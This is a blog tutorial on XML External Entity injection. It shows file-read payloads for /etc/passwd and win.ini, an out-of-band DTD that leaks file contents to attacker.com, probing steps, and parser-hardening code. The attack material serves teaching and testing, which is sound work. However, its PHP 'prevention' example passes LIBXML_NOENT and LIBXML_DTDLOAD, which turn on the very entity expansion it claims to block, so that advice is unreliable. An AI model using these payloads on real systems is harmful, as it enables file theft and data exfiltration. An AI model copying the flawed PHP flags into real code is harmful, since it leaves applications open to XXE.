Fading Coder

One Final Commit for the Last Sprint

Home > Tech > Content

A Practical Dive into XML External Entity Injection

Tech 1

XML documents rely on a structured format that includes a declaration, an optional DTD (Document Type Definition), and the main data elements. The DTD allows the definition of entities, which act as placeholders that can expand to predefined values. When an entity references an external resource via the SYSTEM keyword, the XML parser may fetch and insert that resource’s content during processing.

Consider a simple XML payload:

<?xml version="1.0"?>
<!DOCTYPE demo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<app>
  <user>&xxe;</user>
</app>

If the receiving application parses this XML without disabling external entity resolution, the parser will attempt to read the local file /etc/passwd and replace the &xxe; reference with its contents, which then might be reflected in the application’s response.

This behavior originates from the XML specification itself, not from a programming error in the strict sense, but from failing to restrict parser features. Modern libraries often provide safe defaults. For instance, PHP’s libxml versions 2.9.0 and later disable external entity loading by default when using functions like simplexml_load_string. However, developers may inadvertently re-enable dangerous features or use older library versions.

Crafting Attacks with DTDs

Attackers can declare entities inside the DTD block of the XML payload (internal DTD) or reference an externally hosted DTD file:

<!DOCTYPE data [
  <!ENTITY % payload SYSTEM "http://attacker.com/evil.dtd">
  %payload;
]>

External DTDs enable out-of-band exfiltration when direct output is not available. The attacker hosts a malicious DTD that defines an entity wrapping sensitive system data and sends it to the attacker’s server:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?collect=%file;'>">
%eval;
%send;

The target parser follows the chain: it reads the local file into %file, constructs a dynamic entity send that includes the file content in a URL, and finally triggers send, ganerating an HTTP request that leaks the data.

Identifying XXE Entry Points

Applications that accept XML input—whether in raw XML format, SOAP web services, or even hidden inside JSON or YAML structures—may process the XML with a vulnerable parser. Indicators include:

  • SOAP endpoints with a Content-Type of text/xml or application/xml.
  • Web services that except user-defined XML payloads (e.g., REST APIs with XML body).
  • Any endpoint where XML appears with in another encoding, like a base64-encoded string inside JSON. A common scenario is converting JSON to XML on the server side.

Testing with a Practical Example

Assume a web application that echoes a name element:

<?xml version="1.0"?>
<data>
  <name>guest</name>
</data>

The server responds with "Hello, guest". To test for XXE, submit:

<?xml version="1.0"?>
<!DOCTYPE test [
  <!ENTITY probe SYSTEM "http://yourserver.test/check">
]>
<data>
  <name>&probe;</name>
</data>

If the server makes a request to your domain, the parser supports external entities. Next, attempt file read by changing the entity to file:///C:/windows/win.ini (Windows) or file:///etc/passwd (Unix-like). A reflected file confirms the vulnerability.

For blind scenarios, employ an out-of-band technique with an external DTD as described above. Additionally, parameter entities can be used to bypass certain restrictions, such as when the application validates the document structure before processing.

Preventing XXE

The most reliable defense is to completely disable DTD processing and external entities in the XML parser. Configuration depends on the language and library. In PHP with DOMDocument, for example:

$dom = new DOMDocument();
$dom->loadXML($xmlInput, LIBXML_NOENT | LIBXML_DTDLOAD);
// Better: completely disable external resources
$dom->loadXML($xmlInput, LIBXML_NONET);

For Java’s DocumentBuilderFactory, set:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Besides parser hardening, validate input against an XML schema (XSD) when the structure is known, and whitelist acceptable protocols. Avoid manual serialization/deserialization of XML where possible, and keep all XML libraries up to date.

Related Articles

Understanding Strong and Weak References in Java

Strong References Strong reference are the most prevalent type of object referencing in Java. When an object has a strong reference pointing to it, the garbage collector will not reclaim its memory. F...

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Introduction Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can r...

SBUS Signal Analysis and Communication Implementation Using STM32 with Fus Remote Controller

Overview In a recent project, I utilized the SBUS protocol with the Fus remote controller to control a vehicle's basic operations, including movement, lights, and mode switching. This article is aimed...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.